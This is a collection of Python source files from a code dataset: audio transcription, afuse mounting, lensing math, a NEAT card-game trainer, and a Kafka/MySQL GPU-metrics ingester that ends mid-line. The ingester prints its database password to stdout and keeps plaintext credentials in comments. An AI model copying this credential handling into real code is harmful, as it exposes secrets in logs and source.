+{"seq_id":"375688889","text":"from divide_by_people import Divider\nfrom speech_to_text import Converter\n\n\nclass AudioNote:\n def getResult(self, filename, path):\n d = Divider()\n c = Converter()\n wavfiles, speaker = d.divide(filename, path)\n index = 0\n f = open(\"out.txt\", \"w\")\n for fn in wavfiles:\n text = c.convert(path + fn)\n f.write('Speaker ')\n f.write(str(speaker[index]))\n f.write(': ')\n for t in text:\n f.write(t)\n f.write('\\n')\n index = index + 1\n f.close() #close the transcript once all segments are written\n\nif __name__ == '__main__':\n data = AudioNote()\n data.getResult('meeting.wav', './media/')\n","sub_path":"audio_note.py","file_name":"audio_note.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"478423025","text":"#!/usr/bin/env python2\n\n# Initializes afuse according to file\n# usage: ./init.py [afusetab]\n# afusetab: list of afuse mounts to init. If none is present, a local file named afusetab is assumed.\n\nfrom __future__ import print_function\nimport sys\nimport os\nimport yaml\nimport re\nimport argparse\n\nparser = argparse.ArgumentParser(description='Initialize afuse according to a file')\nparser.add_argument('afusetab',nargs='?',default=None,help='Location of the afusetab file to parse. Defaults to \"afusetab\" located near script')\nparser.add_argument('-f','--foreground',help='run afuse in foreground (for troubleshooting)',action='store_true')\nargs = parser.parse_args()\n\nafusetab = args.afusetab\nif afusetab is None:\n afusetab = os.path.join(os.path.dirname(__file__),'afusetab')\ntry:\n with open(afusetab,'r') as f:\n doc = yaml.safe_load(f) #safe_load: plain yaml.load without a Loader is rejected by modern PyYAML\nexcept:\n raise Exception(\"couldn't parse afusetab. Make sure it exists and is valid\")\n #print(\"couldn't parse afusetab. 
Make sure it exists and is valid\", file=sys.stderr)\n #sys.exit(2)\n\n# script paths:\nd = os.path.dirname(os.path.abspath(__file__))\nhandles=\"%s/handle.py\" % (d)\nlists=\"%s/list.py\" % (d)\n\n# convert afusetab to fully qualified location\nafusetab=os.path.abspath(os.path.expanduser(afusetab))\n\n\n# find all roots in the document, and for every one of those invoke a proper command\nfor root in doc:\n realroot=os.path.abspath(os.path.expanduser(root))\n mounttemplate='mount_template=%s %s %s %%r %%m mount' % (handles,afusetab,root)\n unmounttemplate='unmount_template=%s %s %s %%r %%m unmount' % (handles,afusetab,root)\n poproottemplate='populate_root_command=%s %s \\'%s\\'' % (lists,afusetab,root)\n callarr = ['afuse','-o','nonempty','-o',mounttemplate,'-o',unmounttemplate,'-o',poproottemplate,realroot]\n if(args.foreground): callarr.append('-f')\n from subprocess import call\n call(callarr)\n","sub_path":"init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"55098784","text":"import numpy as np\nimport scipy\nfrom scipy import ndimage\nimport matplotlib\nfrom matplotlib import pyplot as plt\n\nGX,GY,GB,GE,GPA,GSM,GSA = range(7)\nSX,SY,SF,SW,SE,SPA = range(6)\n\ndef shift_func(coords,xoff,yoff):\n return (yoff[coords[0],coords[1]],xoff[coords[0],coords[1]])\n\ndef sie (x,y,lb,le,lpad,smag,sangd):\n lpa,sang = np.deg2rad(lpad),np.deg2rad(sangd)\n cpa,spa = np.cos(lpa),np.sin(lpa)\n xp,yp = x*cpa + y*spa, -x*spa + y*cpa\n phis = np.arctan2 (yp,xp)\n sphis,cphis = np.sin(phis),np.cos(phis)\n axrat = 1.0-le\n sqaxrat = np.sqrt(axrat)\n axprime = np.sqrt(1.0-axrat*axrat)\n kappa = 0.5*sqaxrat/np.hypot(xp/lb,axrat*yp/lb)\n gamma1 = kappa*(2.*sphis*sphis-1.0)\n gamma2 = -kappa*2.*sphis*cphis\n fasin = np.arcsin(axprime*sphis)\n fasinh = np.arcsinh (axprime*cphis/axrat)\n fratio = sqaxrat/axprime\n pot = np.hypot(x,y)*lb*fratio*(sphis*fasin+cphis*fasinh)\n xs,ys = xp - lb*fratio*fasinh, yp - lb*fratio*fasin\n xp,yp = xs*cpa - ys*spa, xs*spa + ys*cpa\n csang,ssang = np.cos(2.*sang),np.sin(2.*sang)\n csath,ssath = np.cos(2.*(sang-lpa)),np.sin(2.*(sang-lpa))\n xp += -smag * (x*csang + y*ssang)\n yp += -smag * (x*ssang - y*csang)\n gamma1 += smag*csath\n gamma2 -= smag*ssath\n return xp,yp,kappa,gamma1,gamma2,pot\n\ndef lens (g,a=[],gpix=128):\n try:\n x,y = a[1]-g[GX],a[0]-g[GY]\n except:\n x,y=np.meshgrid(np.arange(gpix)-g[GX],np.arange(gpix)-g[GY]) \n xp,yp,kappa,gamma1,gamma2,pot = sie (x,y,g[GB],\\\n max(g[GE],1.E-5),g[GPA],g[GSM],g[GSA])\n u = np.array(([kappa+gamma1, gamma2, gamma2, kappa-gamma1]))\n return u,np.array([x-xp,y-yp]),pot\n\ndef mxrot (a, angle):\n t = np.zeros_like(a)\n c,s = np.cos(np.deg2rad(angle)),np.sin(np.deg2rad(angle))\n t[0],t[1],t[2],t[3] = c*a[0]+s*a[2], c*a[1]+s*a[3],\\\n -s*a[0]+c*a[2],-s*a[1]+c*a[3]\n return t\n\ndef scene (ag, s, gpix):\n ag = [ag] if ag.ndim==1 else ag\n aoff = np.zeros((2,s.shape[0],s.shape[1]))\n for g in ag:\n u,alpha,pot = lens(g,[],gpix)\n aoff[0] += alpha[0]\n aoff[1] += alpha[1]\n xoff,yoff = np.meshgrid (np.arange(s.shape[0],dtype='float'),\\\n np.arange(s.shape[1],dtype='float'))\n xoff -= aoff[0]\n yoff -= aoff[1]\n return ndimage.geometric_transform(s,shift_func,extra_arguments=(xoff,yoff))\n\ndef gcsm (ag,src,gpix):\n if len(src):\n allpot,a,aoff = 0.0, np.array([1.,0.,0.,1.]), np.array([0.0,0.0])\n else:\n allpot = np.zeros((gpix,gpix))\n a = np.zeros((4,gpix,gpix)); a[0]=1.; a[3]=1.\n aoff = 
np.zeros((2,gpix,gpix))\n\n for g in ag:\n u,alpha,pot = lens(g,[src[0],src[1]],gpix) if len(src) else lens(g,[],gpix)\n allpot += pot\n kappa = 0.5*(u[0]+u[3])\n u[0]-=kappa\n u[3]-=kappa\n u = mxrot(u,-2*g[GPA])\n u[0]+=kappa\n u[3]+=kappa\n a -= u\n aoff[0] += alpha[0]\n aoff[1] += alpha[1]\n# tdel -= allpot # !!! tdel comes out wrong at the moment\n tdel = 0.0\n mag = 1.0/(a[0]*a[3]-a[1]*a[2])\n return a,aoff,allpot,tdel\n\ndef draw_caus (s,ag,filt=2.0,blc=[0,0],trc=[0,0],gpix=128):\n \n trc = [gpix,gpix] #NB: overrides the trc argument; the old conditional fallback is disabled\n a,aoff,allpot,tdel = gcsm (ag,[],gpix)\n mag = (a[0]*a[3]-a[1]*a[2])\n # plt.clf()\n # plt.imshow(mag)\n # plt.show()\n # plt.contour(scipy.ndimage.gaussian_filter(mag[blc[1]:trc[1],blc[0]:trc[0]],\\\n # filt),levels=[0.0],colors='black')\n print (mag.shape)\n copymag = np.copy(mag)\n zoomfac = 3\n # copymag = scipy.ndimage.zoom(copymag, zoomfac) \n print (mag.shape)\n caus = 0.0*mag\n print (caus.shape)\n \n for iy in range(gpix):\n for ix in range(gpix):\n if mag[iy,ix]**2. < 0.0001:\n jy = iy-aoff[1,iy,ix]\n jx = ix-aoff[0,iy,ix]\n try:\n caus[int(jy),int(jx)]=1.0 #plain int(): np.int was removed from NumPy\n except:\n pass\n # caus = scipy.ndimage.zoom(caus, zoomfac)\n# fig, ax = plt.subplots(subplot_kw={'aspect': 'equal'})\n trc[0]*=zoomfac\n trc[1]*=zoomfac\n print( trc, blc)\n magmag = 1/np.abs(mag)\n np.putmask(magmag, magmag>10000, 10000)\n # magmag = np.log10(magmag)\n # ax.imshow(magmag)\n # ax.imshow(caus[blc[1]:trc[1],blc[0]:trc[0]], cmap = 'gray_r')\n # ax.contour(scipy.ndimage.gaussian_filter(copymag[blc[1]:trc[1],blc[0]:trc[0]],\\\n # filt),levels=[0.0],colors='black')\n # from matplotlib.patches import Ellipse \n # ax.add_patch(Ellipse((s[0],s[1]), width=1, height = 1, fill = 0, color = 'red'))\n # for j in range(1):\n # for i in xrange(comps[j].shape[0]):\n # xpos = comps[j][i,0]\n # ypos = comps[j][i,1]\n # ax.add_patch(Ellipse((xpos,ypos), width=5, height = 5, fill = 0, color = 'blue'))\n # plt.show() \n return caus, magmag, copymag , blc, trc \n \n\ndef groot(ag,s):\n return s\n","sub_path":"pgetu.py","file_name":"pgetu.py","file_ext":"py","file_size_in_byte":4966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"125065875","text":"from neat import population, parallel\nimport math\nimport neat\nimport carte\nimport gioco\nimport itertools\nimport pickle\nimport giocatore\nfrom neural_player import NeuralPlayer\n\ndef eval_fitness(genoma):\n tot = 0\n for i in range(100):\n tot += gioca(genoma)\n tot /= 100\n return tot\n\ndef gioca(genoma):\n game = gioco.Gioco(2)\n g1 = giocatore.Giocatore([carte.Carta(carte.Seme.BASTONI, 2),carte.Carta(carte.Seme.BASTONI, 2),carte.Carta(carte.Seme.BASTONI, 2)])\n g1.mano = game.giocatori[0].mano\n\n g2 = NeuralPlayer([carte.Carta(carte.Seme.BASTONI, 2),carte.Carta(carte.Seme.BASTONI, 2),carte.Carta(carte.Seme.BASTONI, 2)])\n g2.mano = game.giocatori[1].mano\n g2.setgenoma(genoma)\n g2.setbriscola(game.briscola)\n\n game.giocatori[0] = g1\n game.giocatori[1] = g2\n game.run()\n return g2.punti()/120\n\n\n\ndef main():\n pop = neat.population.Population('briscola_config')\n gioco.print = lambda _: \"\"\n giocatore.print = lambda _: \"\"\n giocatore.input = lambda _: \"0\"\n pe = parallel.ParallelEvaluator(4, eval_fitness)\n pop.epoch(pe.evaluate, 400)\n\n print(\"Fittest genome: \")\n winner = pop.most_fit_genomes[-1]\n print(winner)\n\n with open('briscola_giocatore_random', 'wb') as f:\n pickle.dump(winner, f)\nif __name__ == '__main__':\n 
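#entry point: evolve the NEAT genomes against the scripted opponent (the lambdas above silence game output and force every input to 0 so training runs unattended)\n 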
main()\n","sub_path":"neural_random_briscola.py","file_name":"neural_random_briscola.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"636931337","text":"#!/usr/bin/env python\nimport threading, logging, time\nimport multiprocessing as mp\n\nfrom kafka import KafkaConsumer, TopicPartition\nimport json\n\nimport MySQLdb\nimport os\nimport re\n\nkafka_broker = os.environ['KAFKA_BROKER']\nprint(kafka_broker)\nmysql_db_host = os.environ['MYSQL_DB_HOST']\nprint(mysql_db_host)\nmysql_db_port = os.environ['MYSQL_DB_PORT']\nprint(mysql_db_port)\nmysql_db_user = os.environ['MYSQL_DB_USER']\nprint(mysql_db_user)\nmysql_db_password = os.environ['MYSQL_DB_PASSWORD']\n\n#mysql_db_host = '10.35.64.23'\n#print(mysql_db_host)\n#mysql_db_port = '3306'\n#print(mysql_db_port)\n#mysql_db_user = 'springuser'\n#print(mysql_db_user)\n#mysql_db_password = 'springuser'\nprint(mysql_db_password)\n\n#connection = MySQLdb.connect(\n# host = \"127.0.0.1\",\n# user = \"root\",\n# passwd = \"12345\",\n# db ='computemetrics'\n#)\n#gpu_info = mp.Manager().dict();\ndef conv2G(string):\n print(type(string))\n if type(string) == type(None):\n return(0)\n if type(string) == type(''):\n value = float((re.findall(\"(\\d+(\\.\\d*)?)\", string)[0])[0])\n if string.find('Mi') != -1:\n return (value/1024.0)\n if string.find('m') != -1:\n return (value/1000.0)\n return(value)\n return(float(string))\n\ndef mysql_query(db, query, params):\n cur = db.cursor()\n result = None\n try:\n result = cur.execute(query, params)\n except MySQLdb.Error:\n db.ping(True)\n result = cur.execute(query, params)\n db.commit()\n return(cur)\n\ndef get_gpu_id(db, data):\n select_gpuid = (\n \"SELECT * FROM `gpus` WHERE `uuid` = %(uuid)s;\"\n )\n result = mysql_query(db, select_gpuid, data)\n result = result.fetchone()\n if result != None:\n return(result[0])\n else:\n return(result)\n\ndef get_container_id(db, data):\n select_cgid = (\n \"SELECT * FROM `containergpus` WHERE `gpu_id` = %(gpu_id)s and `nspid` = %(nspid)s ORDER BY `id` DESC;\"\n #\"SELECT * FROM `containergpus` WHERE `nspid` = %(nspid)s;\"\n )\n result = mysql_query(db, select_cgid, data)\n result = result.fetchone()\n if result != None:\n return(result[1])\n else:\n return(result)\n\ndef get_namespace_id(db, data):\n select_cgid = (\n \"SELECT * FROM `containergpus` WHERE `gpu_id` = %(gpu_id)s and `nspid` = %(nspid)s ORDER BY `id` DESC;\"\n #\"SELECT * FROM `containergpus` WHERE `nspid` = %(nspid)s;\"\n )\n result = mysql_query(db, select_cgid, data)\n result = result.fetchone()\n if result != None:\n return(result[5])\n else:\n return(result)\n\n#mysql> SHOW COLUMNS FROM gpus;\n#+----------------------+-------------+------+-----+---------+----------------+\n#| Field | Type | Null | Key | Default | Extra |\n#+----------------------+-------------+------+-----+---------+----------------+\n#| id | int(10) | NO | PRI | NULL | auto_increment |\n#| uuid | varchar(64) | NO | | NULL | |\n#| name | varchar(32) | NO | | NULL | |\n#| enforced.power.limit | int(4) | YES | | NULL | |\n#| memory.total | int(4) | YES | | NULL | |\n#| hostname | varchar(32) | NO | | NULL | |\n#+----------------------+-------------+------+-----+---------+----------------+\ndef insertGpuInfo(db, data, update = False):\n query = ''\n if not update:\n select_gpuuuid = (\n \"SELECT * FROM `gpus` WHERE `uuid` = %(uuid)s;\"\n )\n result = mysql_query(db, select_gpuuuid, data)\n\n if result.rowcount == 0:\n query = (\n \"INSERT 
INTO `gpus` (`uuid`, `name`, `enforced_power_limit`, `memory_total`, `hostname`) \"\n \"VALUES (%(uuid)s, %(name)s, %(enforced.power.limit)s, %(memory.total)s, %(hostname)s);\"\n )\n result = mysql_query(db, query, data)\n return(result.lastrowid)\n\n return(result.fetchone()[0])\n else:\n #sqlcmd = ''\n #if data.get('user') != None:\n sqlcmd = \"UPDATE `gpus` set `user` = %(user)s where `id` = %(id)s\"\n if data.get('used') != None:\n if data.get('used') == 0:\n data['used'] = None\n sqlcmd = \"UPDATE `gpus` set `used` = %(used)s where `id` = %(id)s\"\n query = (\n sqlcmd\n )\n\n mysql_query(db, query, data)\n return(data['id'])\n\ndef get_gpu_info_db(db, data, type = 0):\n query = ''\n if type == 0: #fetch user\n query = (\n \"SELECT `id`, `user` FROM `gpus` where `user` is not null;\"\n )\n if type == 1: #fetch used\n query = (\n \"SELECT `id`, `used` FROM `gpus` where `used` is not null and `hostname` = %(hostname)s;\"\n )\n\n result = mysql_query(db, query, data)\n t = result.fetchall()\n #print(\"tttttt\", t)\n return dict((x, y) for x, y in t)\n\ndef insertCurrentGpuMetric(db, data):\n print(data)\n select_gpu_metric = (\n \"SELECT * FROM `currentgpumetrics` WHERE `gpu_id` = %(gpu_id)s ORDER BY `id` DESC;\"\n )\n result = mysql_query(db, select_gpu_metric, data)\n\n found = False\n if result != None and result.rowcount != 0:\n found = True\n result = result.fetchone()\n\n if found == False:\n #print(data)\n query = (\n \"INSERT INTO `currentgpumetrics` (`gpu_id`, `temperature_gpu`, `utilization_gpu`, `power_draw`, `memory_used`, `query_time`) \"\n \"VALUES (%(gpu_id)s, %(temperature.gpu)s, %(utilization.gpu)s, %(power.draw)s, %(memory.used)s, %(query_time)s);\"\n )\n result = mysql_query(db, query, data)\n #print(\"gpu metric insert : \" + str(data))\n return(result.lastrowid)\n else:\n query = (\n \"UPDATE `currentgpumetrics` SET `query_time` = %(query_time)s, `temperature_gpu` = %(temperature.gpu)s, `utilization_gpu` = %(utilization.gpu)s, `power_draw` = %(power.draw)s, `memory_used` = %(memory.used)s WHERE `id` = %(id)s\"\n )\n data['id'] = result[0]\n mysql_query(db, query, data)\n\n #result = result.fetchone()\n return(result[0])\n\ndef insertGpuMetric(db, data):\n select_gpu_metric = (\n \"SELECT * FROM `gpumetrics` WHERE `gpu_id` = %(gpu_id)s ORDER BY `id` DESC;\"\n )\n result = mysql_query(db, select_gpu_metric, data)\n\n #print(data)\n# found = True\n# if result.rowcount == 0:\n# found = False\n# else:\n# result = result.fetchone()\n #print(result)\n#+----+--------+-------------+------------+----------------------------+-----------------+-----------------+\n#| id | gpu_id | memory_used | power_draw | query_time | temperature_gpu | utilization_gpu |\n#+----+--------+-------------+------------+----------------------------+-----------------+-----------------+\n#| 1 | 1 | 0 | 49 | 2020-03-04T13:36:35.971960 | 31 | 0 |\n\n #(33, 26, 0, 48, '2020-03-04T13:36:41.074563', 29, 0)\n #print(float(result[1]) == float(data['cpu_memory_usage']))\n# if float(result[2]) != float(data['memory.used']):\n# found = False\n# if float(result[3]) != float(data['power.draw']):\n# found = False\n# if float(result[5]) != float(data['temperature.gpu']):\n# found = False\n# if float(result[6]) != float(data['utilization.gpu']):\n# found = False\n #if found == False:\n # print(result)\n\n# if found == False:\n #print(data)\n query = (\n \"INSERT INTO `gpumetrics` (`gpu_id`, `temperature_gpu`, `utilization_gpu`, `power_draw`, `memory_used`, `query_time`) \"\n \"VALUES (%(gpu_id)s, %(temperature.gpu)s, 
%(utilization.gpu)s, %(power.draw)s, %(memory.used)s, %(query_time)s);\"\n )\n result = mysql_query(db, query, data)\n #print(\"gpu metric insert : \" + str(data))\n return(result.lastrowid)\n# else:\n# query = (\n# \"UPDATE `gpumetrics` SET `query_time` = %(query_time)s WHERE `id` = %(id)s\"\n# )\n# mysql_query(db, query, {'id': result[0], 'query_time': data['query_time']})\n\n #result = result.fetchone()\n# return(result[0])\n \ndef insertProcessInfo(db, data):\n select_pid = (\n \"SELECT * FROM `processes` WHERE `pid` = %(pid)s and `nspid` = %(nspid)s and `container_id` = %(container_id)s and `start_time` = %(start_time)s;\"\n )\n result = mysql_query(db, select_pid, data)\n if result.rowcount == 0:\n query = (\n \"INSERT INTO `processes` (`pid`, `nspid`, `command`, `full_command`, `container_id`, `start_time`) \"\n \"VALUES (%(pid)s, %(nspid)s, %(command)s, %(full_command)s, %(container_id)s, %(start_time)s);\"\n )\n result = mysql_query(db, query, data)\n return(result.lastrowid)\n\n result = result.fetchone()\n query = (\n \"UPDATE `processes` SET `query_time` = %(query_time)s WHERE `id` = %(id)s\"\n )\n mysql_query(db, query, {'id': result[0], 'query_time': data['query_time']})\n return(result[0])\n\ndef insertProcessMetric(db, data):\n select_process_metric = (\n \"SELECT * FROM `processmetrics` WHERE `process_id` = %(process_id)s and `gpumetric_id` = %(gpumetric_id)s ORDER BY `id` DESC;\"\n )\n result = mysql_query(db, select_process_metric, data)\n\n found = True\n if result.rowcount == 0:\n found = False\n else:\n result = result.fetchone()\n #(2, 543834112, 0.0, 307, 11, 1, '2020-03-04T13:36:35.971960')\n #print(float(result[1]) == float(data['cpu_memory_usage']))\n if float(result[1]) != float(data['cpu_memory_usage']):\n found = False\n if float(result[2]) != float(data['cpu_percent']):\n found = False\n if float(result[3]) != float(data['gpu_memory_usage']):\n found = False\n if result[4] != data['gpumetric_id']:\n found = False\n # if found == False:\n # print(result)\n\n #print(\"Process MetricFound: \" + str(found))\n if found == False:\n #print(data)\n query = (\n \"INSERT INTO `processmetrics` (`process_id`, `gpumetric_id`, `gpu_memory_usage`, `cpu_percent`, `cpu_memory_usage`, `query_time`) \"\n \"VALUES (%(process_id)s, %(gpumetric_id)s, %(gpu_memory_usage)s, %(cpu_percent)s, %(cpu_memory_usage)s, %(query_time)s);\"\n )\n result = mysql_query(db, query, data)\n #print(\"process metrics insert : \" + str(data))\n return(result.lastrowid)\n \n query = (\n \"UPDATE `processmetrics` SET `query_time` = %(query_time)s WHERE `id` = %(id)s\"\n )\n mysql_query(db, query, {'id': result[0], 'query_time': data['query_time']})\n\n return(result[0])\n\ndef insertNamespaceInfo(db, data):\n# namespace table\n#+-------------------------+-------------+------+-----+---------+----------------+\n#| Field | Type | Null | Key | Default | Extra |\n#+-------------------------+-------------+------+-----+---------+----------------+\n#| id | int(10) | NO | PRI | NULL | auto_increment |\n#| name | varchar(32) | NO | | NULL | |\n#| owner | varchar(64) | YES | | NULL | |\n#| limits.cpu | int(4) | YES | | NULL | |\n#| limits.memory | varchar(32) | YES | | NULL | |\n#| limits.nvidia.com/gpu | int(4) | YES | | NULL | |\n#| requests.cpu | int(4) | YES | | NULL | |\n#| requests.memory | varchar(32) | YES | | NULL | |\n#| requests.nvidia.com/gpu | int(4) | YES | | NULL | |\n#+-------------------------+-------------+------+-----+---------+----------------+\n select_nsname = (\n \"SELECT * FROM 
`namespaces` WHERE `name` = %(name)s;\"\n )\n result = mysql_query(db, select_nsname, data)\n\n if result.rowcount == 0:\n query = (\n \"INSERT INTO `namespaces` (`name`, `owner`, `limits_cpu`, `limits_memory`, `limits_nvidia_com_gpu`, `requests_cpu`, `requests_memory`, `requests_nvidia_com_gpu`) \"\n \"VALUES (%(name)s, %(owner)s, %(limits.cpu)s, %(limits.memory)s, %(limits.nvidia.com/gpu)s, %(requests.cpu)s, %(requests.memory)s, %(requests.nvidia.com/gpu)s);\"\n )\n result = mysql_query(db, query, data)\n return(result.lastrowid)\n\n result = result.fetchone()\n data['id'] = result[0]\n query = (\n \"UPDATE `namespaces` SET `limits_cpu` = %(limits.cpu)s, `limits_memory` = %(limits.memory)s, `limits_nvidia_com_gpu` = %(limits.nvidia.com/gpu)s, `requests_cpu` = %(requests.cpu)s, `requests_memory` = %(requests.memory)s, `requests_nvidia_com_gpu` = %(requests.nvidia.com/gpu)s WHERE `id` = %(id)s\"\n )\n mysql_query(db, query, data)\n\n return(result[0])\n\ndef insertNamespaceUsedResourceQuotas(db, data):\n select_data = (\n \"SELECT * FROM `namespaceusedresourcequotas` WHERE `namespace_id` = %(namespace_id)s ORDER BY `id` DESC;\"\n )\n result = mysql_query(db, select_data, data)\n\n found = True\n if result.rowcount == 0:\n found = False\n else:\n result = result.fetchone()\n#+----+------------+---------------+-----------------------+--------------+-----------------------+--------------+-----------------+-------------------------+#\n#| id | limits_cpu | limits_memory | limits_nvidia_com_gpu | namespace_id | query_time | requests_cpu | requests_memory | requests_nvidia_com_gpu |\n#+----+------------+---------------+-----------------------+--------------+-----------------------+--------------+-----------------+-------------------------+\n#| 1 | 8 | 8704Mi | NULL | 1 | 03/04/202013:36:28CST | 1020 | 4176Mi | 2 |\n#+----+------------+---------------+-----------------------+--------------+-----------------------+--------------+-----------------+-------------------------+\n #print(result[6] != data['requests.cpu'])\n print(result)\n print(data)\n cut_value = 0.00001\n if found and abs(conv2G(result[1]) - conv2G(data['limits.cpu'])) > cut_value: #abs(): a change in either direction should produce a new row\n found = False\n if found and abs(conv2G(result[2]) - conv2G(data['limits.memory'])) > cut_value:\n found = False\n if found and abs(conv2G(result[3]) - conv2G(data['limits.nvidia.com/gpu'])) > cut_value:\n found = False\n if found and abs(conv2G(result[6]) - conv2G(data['requests.cpu'])) > cut_value:\n found = False\n if found and abs(conv2G(result[7]) - conv2G(data['requests.memory'])) > cut_value:\n found = False\n if found and abs(conv2G(result[8]) - conv2G(data['requests.nvidia.com/gpu'])) > cut_value:\n found = False\n print('found', found)\n if found == False:\n #print(data)\n query = (\n \"INSERT INTO `namespaceusedresourcequotas` (`namespace_id`, `limits_cpu`, `limits_memory`, `limits_nvidia_com_gpu`, `requests_cpu`, `requests_memory`, `requests_nvidia_com_gpu`, `start_time`, `query_time`) \"\n \"VALUES (%(namespace_id)s, %(limits.cpu)s, %(limits.memory)s, %(limits.nvidia.com/gpu)s, %(requests.cpu)s, %(requests.memory)s, %(requests.nvidia.com/gpu)s, %(query_time)s, %(query_time)s);\"\n )\n result = mysql_query(db, query, data)\n #print(\"namespaceusedresourcequota insert : \" + str(data))\n return(result.lastrowid)\n\n query = (\n \"UPDATE `namespaceusedresourcequotas` SET `query_time` = %(query_time)s WHERE `id` = %(id)s\"\n )\n mysql_query(db, query, {'id': result[0], 'query_time': data['query_time']})\n\n return(result[0])\n\ndef insertPodInfo(db, data):\n# 
'name':'tf-test-0','start_time':'02/24/202002:32:18UTC','phase':'Running','hostname':'gpu01'\n#+--------------+-------------+------+-----+---------+----------------+\n#| Field | Type | Null | Key | Default | Extra |\n#+--------------+-------------+------+-----+---------+----------------+\n#| id | int(10) | NO | PRI | NULL | auto_increment |\n#| name | varchar(32) | NO | | NULL | |\n#| start_time | varchar(32) | NO | | NULL | |\n#| namespace_id | int(10) | NO | | NULL | |\n#| hostname | varchar(32) | NO | | NULL | |\n#| phase | varchar(16) | YES | | NULL | |\n#+--------------+-------------+------+-----+---------+----------------+\n# print(data)\n select_podname = (\n \"SELECT * FROM `pods` WHERE `name` = %(name)s and `namespace_id` = %(namespace_id)s and `start_time` = %(start_time)s;\"\n )\n result = mysql_query(db, select_podname, data)\n\n if result.rowcount == 0:\n query = (\n \"INSERT INTO `pods` (`name`, `start_time`, `namespace_id`, `hostname`, `phase`, `query_time`) \"\n \"VALUES (%(name)s, %(start_time)s, %(namespace_id)s, %(hostname)s, %(phase)s, %(query_time)s);\"\n )\n result = mysql_query(db, query, data)\n return(result.lastrowid)\n \n result = result.fetchone()\n query = (\n \"UPDATE `pods` SET `query_time` = %(query_time)s WHERE `id` = %(id)s\"\n )\n mysql_query(db, query, {'id': result[0], 'query_time': data['query_time']})\n\n return(result[0])\n\ndef insertContainerInfo(db, data):\n#+-------------------------+-------------+------+-----+---------+----------------+\n#| Field | Type | Null | Key | Default | Extra |\n#+-------------------------+-------------+------+-----+---------+----------------+\n#| id | int(10) | NO | PRI | NULL | auto_increment |\n#| pod_id | int(10) | NO | | NULL | |\n#| name | varchar(32) | NO | | NULL | |\n#| limits.cpu | varchar(32) | YES | | NULL | |\n#| limits.memory | varchar(32) | YES | | NULL | |\n#| limits.nvidia.com/gpu | varchar(32) | YES | | NULL | |\n#| requests.cpu | varchar(32) | YES | | NULL | |\n#| requests.memory | varchar(32) | YES | | NULL | |\n#| requests.nvidia.com/gpu | varchar(32) | YES | | NULL | |\n#| nspid | bigint(10) | NO | | NULL | |\n#+-------------------------+-------------+------+-----+---------+----------------+\n #print(data)\n select_cname = (\n \"SELECT * FROM `containers` WHERE `name` = %(name)s and `pod_id` = %(pod_id)s;\"\n )\n result = mysql_query(db, select_cname, data)\n if result.rowcount == 0:\n query = (\n \"INSERT INTO `containers` (`pod_id`, `name`, `limits_cpu`, `limits_memory`, `limits_nvidia_com_gpu`, `requests_cpu`, `requests_memory`, `requests_nvidia_com_gpu`, `nspid`, `query_time`) \"\n \"VALUES (%(pod_id)s, %(name)s, %(limits.cpu)s, %(limits.memory)s, %(limits.nvidia.com/gpu)s, %(requests.cpu)s, %(requests.memory)s, %(requests.nvidia.com/gpu)s, %(nspid)s, %(query_time)s);\"\n )\n result = mysql_query(db, query, data)\n return(result.lastrowid)\n\n result = result.fetchone()\n query = (\n \"UPDATE `containers` SET `query_time` = %(query_time)s WHERE `id` = %(id)s\"\n )\n mysql_query(db, query, {'id': result[0], 'query_time': data['query_time']})\n\n return(result[0])\n\ndef insertContainerGpus(db, data):\n#+--------------+------------+------+-----+---------+----------------+\n#| Field | Type | Null | Key | Default | Extra |\n#+--------------+------------+------+-----+---------+----------------+\n#| id | int(10) | NO | PRI | NULL | auto_increment |\n#| pod_id | int(10) | NO | | NULL | |\n#| container_id | int(10) | NO | | NULL | |\n#| nspid | bigint(10) | NO | | NULL | |\n#| gpu_id | int(10) | NO | | 
NULL | |\n#+--------------+------------+------+-----+---------+----------------+\n #print(data)\n select_cgname = (\n \"SELECT * FROM `containergpus` WHERE `container_id` = %(container_id)s and (`gpu_id` = %(gpu_id)s or `gpu_id` = 0);\" #parentheses keep the or from matching unrelated rows with gpu_id = 0\n )\n result = mysql_query(db, select_cgname, data)\n\n if result.rowcount == 0:\n query = (\n \"INSERT INTO `containergpus` (`pod_id`, `container_id`, `nspid`, `gpu_id`, `namespace_id`) \"\n \"VALUES (%(pod_id)s, %(container_id)s, %(nspid)s, %(gpu_id)s, %(namespace_id)s);\"\n )\n #print(data)\n result = mysql_query(db, query, data)\n return(result.lastrowid)\n\n result = result.fetchone()\n query = (\n \"UPDATE `containergpus` SET `gpu_id` = %(gpu_id)s, `namespace_id` = %(namespace_id)s WHERE `id` = %(id)s\"\n )\n mysql_query(db, query, {'id': result[0], 'gpu_id': data['gpu_id'], 'namespace_id': data['namespace_id']})\n return(result[0])\n\ndef checkifexist(db, table, data):\n #print(data)\n select_querytime = (\n \"SELECT * FROM `\" + table + \"` WHERE `query_time` = %(query_time)s;\"\n )\n result = mysql_query(db, select_querytime, data)\n return(result.rowcount != 0)\n\ndef processGpuMetrics(gpu, connection):\n #gpu = args[0]\n #connection = args[1]\n# connection = MySQLdb.connect(\n# host = mysql_db_host,\n# user = mysql_db_user,\n# passwd = mysql_db_password,\n# db ='computemetrics'\n# )\n\n #print('gpu uuid:', gpu['uuid'])\n gpu_id = 0\n gpumetric_id = 0\n\n try:\n gpu_id = get_gpu_id(connection, {'uuid': gpu['uuid']})\n gpumetric_id = insertGpuMetric(connection, {\n 'gpu_id': gpu_id, \\\n 'temperature.gpu': gpu['temperature.gpu'], \\\n 'utilization.gpu': gpu['utilization.gpu'], \\\n 'power.draw': gpu['power.draw'], \\\n 'memory.used': gpu['memory.used'], \\\n 'query_time': gpu['query_time']\n })\n\n# curr_gpumetric_id = insertCurrentGpuMetric(connection, {\n# 'gpu_id': gpu_id, \\\n# 'temperature.gpu': gpu['temperature.gpu'], \\\n# 'utilization.gpu': gpu['utilization.gpu'], \\\n# 'power.draw': gpu['power.draw'], \\\n# 'memory.used': gpu['memory.used'], \\\n# 'query_time': gpu['query_time']\n# })\n\n except MySQLdb.Error:\n print(MySQLdb.Error)\n\n #print(gpu_id)\n# used = 